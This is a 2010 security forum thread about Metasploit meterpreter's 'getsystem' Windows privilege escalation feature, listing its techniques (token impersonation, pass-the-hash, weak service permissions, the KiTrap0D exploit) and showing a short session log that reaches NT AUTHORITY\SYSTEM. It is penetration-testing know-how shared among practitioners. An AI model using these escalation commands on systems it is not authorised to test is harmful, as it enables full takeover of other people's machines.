.

Getsystem privledge escalation using Metasploit

<<

Jhaddix

User avatar

Sr. Member
Sr. Member

Posts: 317

Joined: Wed Oct 29, 2008 10:25 pm

Post Mon Mar 15, 2010 5:52 pm

Getsystem privledge escalation using Metasploit

Sorry to spam the posts guys, i just thought people would like to read these.

Videos are at the bottom link:
A few weeks ago Chris Gates (ala Attack Research/Carnal Ownage/ethicalhacker.net) and Joshua Gauthier showed some quick snippets of Metasploit’s Getsystem extension. Getsystem is meterpreter’s new (windows) privilege escalation extension used in the priv module.

Getsystem uses several techniques for priv escalation:

    * Windows Impersonation Tokens (fixed by MS09-012)
    * Abusing LSASS via token passing (Pass-the-Hash) which requires Administrator anyway.
    * Exploiting weak permissions (read and write) in the services (most of them by default run as SYSTEM, if you are lucky they run as a domain administrator).
    * Improved KiTrap0D exploit released by Tavis Ormandy ( MS10-015 patched as of now)

As more privilege escalation exploits appear this year they will no doubt be rolled into the Getsystem extension which i will be keeping a watchful eye on. Thanks to Stephen Fewer for adding the new functionality to Getsystem.

Also, check out Bernardo Damele’s (author of SQLmap!) walkthrough on integrating Metasploit privilege escalation via SQLmap for post database exploitation. Here.

And a sample of the KiTrap0D exploit below in MSF by Pieter Danhieux (not Getsystem but same functionality):



Kitrap0d in Metasploi 3.3.4-DEV

meterpreter > use priv
Loading extension priv…success.

meterpreter > getsystem -h
Usage: getsystem [options]
Attempt to elevate your privilege to that of local system.
OPTIONS:

-h Help Banner.
-t The technique to use. (Default to ‘0′).
0 : All techniques available
1 : Service – Named Pipe Impersonation (In Memory/Admin)
2 : Service – Named Pipe Impersonation (Dropper/Admin)
3 : Service – Token Duplication (In Memory/Admin)
4 : Exploit – KiTrap0D (In Memory/User)

meterpreter > getsystem -t 1
…got system (via technique 1).

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM


http://www.securityaegis.com/getsystem- ... etasploit/
<<

Ketchup

User avatar

Hero Member
Hero Member

Posts: 1021

Joined: Fri Jul 04, 2008 7:44 pm

Location: Philadelphia, PA

Post Mon Mar 15, 2010 6:03 pm

Re: Getsystem privledge escalation using Metasploit

Jason, thanks for the post, that's very good to know.  Do you know if that module is native to MSF 3.3.4 DEV?  Or is that available in other versions as well?
~~~~~~~~~~~~~~
Ketchup
<<

Jhaddix

User avatar

Sr. Member
Sr. Member

Posts: 317

Joined: Wed Oct 29, 2008 10:25 pm

Post Mon Mar 15, 2010 6:04 pm

Re: Getsystem privledge escalation using Metasploit

It's now available in the trunk =)
<<

KrisTeason

User avatar

Hero Member
Hero Member

Posts: 515

Joined: Sat Sep 08, 2007 7:48 pm

Location: /dev/null

Post Tue Mar 16, 2010 1:52 am

Re: Getsystem privledge escalation using Metasploit

Definitely a great new feature added into the meterpreter. I've got to toy with this one sometime. It's getting to the point where they're keeping this framework up-to-date with goodies that I haven't gotten a chance to try out some of the newer features. I remember wishing I had it a few months ago when I was running client-side exploits on my Vista machine. Great post!
eCPPT (Silver/Gold), eWPT, GSEC, GISP, GCIH, OSCP, OSWP

Return to Tools

Who is online

Users browsing this forum: No registered users and 0 guests

.
Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software